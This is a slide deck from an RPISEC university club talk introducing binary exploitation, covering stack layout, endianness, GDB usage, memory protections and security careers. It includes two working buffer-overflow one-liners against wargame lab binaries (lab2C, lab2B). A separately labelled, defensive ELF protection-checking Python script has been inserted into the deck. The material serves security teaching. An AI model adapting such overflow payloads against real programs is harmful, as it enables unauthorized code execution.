security & exploitation - science at...
Post on 05-Apr-2018
whoami
RPISEC - 05/11/2015 OS Security 2
• Markus Gaasedelen – B.S. Computer Science ’15
• Security Enthusiast
– I like to hack things
• President of RPISEC
– http://rpis.ec
What is RPISEC?
• The Computer Security Club @ RPI
– http://rpis.ec
• The leading authority on campus for any and all things computer security related
• We compete in hacking competitions known as CTFs (Capture The Flag) and we’re very good at them
• We teach cool and applicable security skills at our weekly meetings
– 5-7pm Fridays, DCC 324
What is Security?
• Security == Hacking
– ‘politically correct’
– Cyber is the buzzword
• Very technical and rewarding challenges
• Rarely touched upon in academia
• Many different categories of security
Categories of Security
• Cryptography
• Web Security
• Vulnerability Research
• Binary Exploitation
• Reverse Engineering
• Malware Analysis
• Systems Security
• Embedded Hardware Hacking
• Network Security
• Digital Forensics
• Physical Security
• Pentesting
• …
The kind of stuff I’ll talk about today
Defining Binary Exploitation
• Binary Exploitation – Carefully leveraging bugs in an application to cause extreme but controlled failure
Binary Exploitation
But what does that even mean?
‘extreme but controlled failure’
Super Mario World Silliness
https://youtu.be/jnZ2NNYySuE?t=38
Defining Binary Exploitation
• Exploitation requires intimate knowledge of the language, compiler, and the machine
The Unexciting Languages
• Binary exploitation isn’t really a thing for managed or scripting languages
– C#, .NET, JavaScript, Lua, Python, etc
• Slower, automates a lot of stuff for you
– Driving an automatic
The C Language
• C is a ‘low level’ language
– Compiles straight to machine code
• Very fast
– Very fine control over the machine and memory
• It’s like driving a manual!
– Easy to do stupid things
Pulling Back the Curtain
“… there's way too much information to decode the Matrix. You get used to it, though. Your brain does the translating. I don't even see the code. All I see is blonde, brunette, redhead.” -Cypher, The Matrix
WELCOME TO THE WARZONE
let’s dive right in and try breaking some stuff
Getting Started / Tips
• cd /levels/lab2
• ./lab2C AAAA…
• python -c 'print "A"*20'
• gdb ./lab2C
– run
• In GDB:
– info functions
– info registers
• i r
– disassemble <function>
• disas main
– break <function>
• b main
– break * <address>
• b * 0x08048455
Stack Overview
• The stack is a region of memory for a program to maintain function variables, arguments, and control flow metadata during execution
Endianness
• Endianness – How data is stored in memory
• Modern computers are generally little endian – ‘little end in’
• Endianness can be confusing, and I don’t want to get into the details
– 0x41424344 stored as 0x44, 0x43, 0x42, 0x41
– 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde
lab2C Exploit
./lab2C $(python -c 'print "A"*15 + "\xef\xbe\xad\xde"')
Example ELF / EXE in Memory
[Figure: runtime memory map spanning 0x00000000 – Start of memory to 0xFFFFFFFF – End of memory. Regions shown: ELF Executable (.text segment, 0x08048000 – Start of .text Segment; .data segment), Heap, Libraries (libc) (.text segment), Stack (0xbfff0000 – Top of stack). A run of build-up slides animates EIP stepping through executable code in the executable and in libc.]
“If your program simply segfaulted, consider yourself lucky.”
-Chuck Stewart
warzone.rpis.ec SSH in as lab2B
use the password you got from solving lab2C
lab2B Exploit
./lab2B $(python -c 'print "A"*27 + "\x7d\x84\x04\x08" + "B"*4 + "\xa0\x85\x04\x08"')
Modern Protections
• Data Execution Prevention (DEP)
• Address Space Layout Randomization (ASLR)
• Stack Cookies (Canaries)
• Read Only Relocation (RELRO)
• FORTIFY_SOURCE
• …
• These only make things harder, not impossible
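As a defender-side check for the protections listed above, here is an added example (not from the talk or from RPISEC) that reads NX/DEP, RELRO and PIE status straight from an ELF64 file's program headers, the way checksec-style tools do; it honours the EI_DATA byte, so the byte-order point from the Endianness slide is handled rather than assumed. The two sample images are constructed inline; pass a path to inspect a real binary.

```python
import struct

# ELF constants (values from the ELF specification / Linux ABI)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551   # stack permissions the binary asks the loader for
PT_GNU_RELRO = 0x6474E552   # region made read-only once relocation is done
PF_X = 0x1

def elf_protections(data: bytes) -> dict:
    """Report NX, RELRO and PIE from an ELF64 image's header and program headers.

    Only what those headers expose is covered; stack cookies and FORTIFY_SOURCE
    need a look at the imported symbols and are out of scope here.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("expected an ELF64 image")
    end = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = little, 2 = big endian
    (e_type, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum) = struct.unpack_from(end + "HHIQQQIHHH", data, 16)
    nx, relro = False, False   # no PT_GNU_STACK at all means an executable stack on x86 Linux
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(end + "II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"nx": nx, "relro": relro, "pie": e_type == ET_DYN}

def build_sample_elf(e_type: int, phdrs: list) -> bytes:
    """Constructed minimal ELF64 image (header plus program headers, no code)."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # 64-bit, little endian, v1
    header = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, 64, 0, 0,
                                 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return header + body

# Constructed samples: a hardened PIE with a non-executable stack and RELRO,
# and a weak non-PIE build whose GNU_STACK asks for RWX (no DEP/NX)
HARDENED = build_sample_elf(ET_DYN, [(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)])
WEAK = build_sample_elf(ET_EXEC, [(PT_GNU_STACK, 7)])

if __name__ == "__main__":
    import sys
    target = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else WEAK
    print(elf_protections(target))
```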
links.exe
• Challenge from the CSAW 2014 CTF Finals
• 64bit exploitation on Windows 8.1
– Basically all protections are on by default
• No source code, lots of x64 reversing
– Doubly linked circular list implementation
• pushfront, pushback, delete, copy, print, sort …
Wrapping up Binary Exploitation
• You might consider yourself a *rockstar* programmer, but you probably know little to nothing about secure coding practices or the implications of your mistakes
• Compilers go out of their way to prevent your bugs from causing catastrophic failure
• Just because your program doesn’t appear to segfault or crash doesn’t mean it is bug free or without vulnerabilities
• Binary exploitation is nothing like standard software development - I truly think of it as an art
…so…many…jobs…
• Typical titles / positions
– Information Security Analyst / Engineer
– Security Software Engineer
– Vulnerability Research Engineer
– Web Application Security Engineer
– Computer Network Operations
– Threat & Incident Response Engineer
– Product Security Reverse Engineer
– Malware Analyst / Reverse Engineer
– …
Entering the Job Market
• There is a major shortage of qualified security individuals in industry
• Skilled in security & have a B.S. in CS?
– Government, Contractors, FFRDCs
• $70k – $100k
– Private / Commercial
• $100k – ??
• Anything less and you’re missing out
Security @ RPI
• Malware Analysis – Fall 2015 – Coming soon!
• Modern Binary Exploitation – Spring 2015 – http://rpis.ec/binexp/
• Hardware Reverse Engineering – Spring 2014 – http://security.cs.rpi.edu/courses/hwre-spring2014/
• Malware Analysis – Spring 2013 – http://security.cs.rpi.edu/courses/malware-spring2013/
• Secure Software Principles – Spring 2010 – http://cs.rpi.edu/academics/courses/spring10/csci4971/